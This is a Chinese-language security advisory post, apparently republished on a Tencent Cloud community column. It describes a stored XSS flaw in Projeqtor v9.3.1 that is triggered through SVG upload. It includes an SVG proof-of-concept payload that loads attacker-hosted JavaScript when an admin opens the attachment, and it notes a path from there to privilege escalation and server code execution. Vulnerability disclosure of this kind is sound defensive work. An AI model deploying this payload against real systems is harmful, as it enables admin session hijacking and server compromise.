前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Projeqtor v9.3.1 存储型 XSS

Projeqtor v9.3.1 存储型 XSS

原创
作者头像
Khan安全团队
发布2022-01-05 10:08:59
3370
发布2022-01-05 10:08:59
举报
文章被收录于专栏:Khan安全团队

供应​​商主页:https://www.projeqtor.org/en/

链接:https://www.projeqtor.org/en/product-en/downloads

测试:Ubuntu、LAAMP # 供应​​商:投影仪 # 版本:v9.3.1

漏洞描述:

Projeqtor 9.3.1 版存在通过 SVG 文件上传的存储型 XSS 漏洞。低级别用户可以上传包含恶意 Javascript 的 svg 图像。通过这种方式,攻击者可以提升权限并上传恶意插件,从而在托管应用程序的服务器中执行任意代码。

重现步骤:

将以下 XML 代码作为 SVG 文件上传并更改您控制的位置的 xlink。一旦管理员用户打开附件,攻击者托管的 Javascript 代码就会执行。

代码语言:javascript
复制
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
    <script xlink:href="<script src=CHANGE this for the location of your script></script>"></script>
</svg>

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档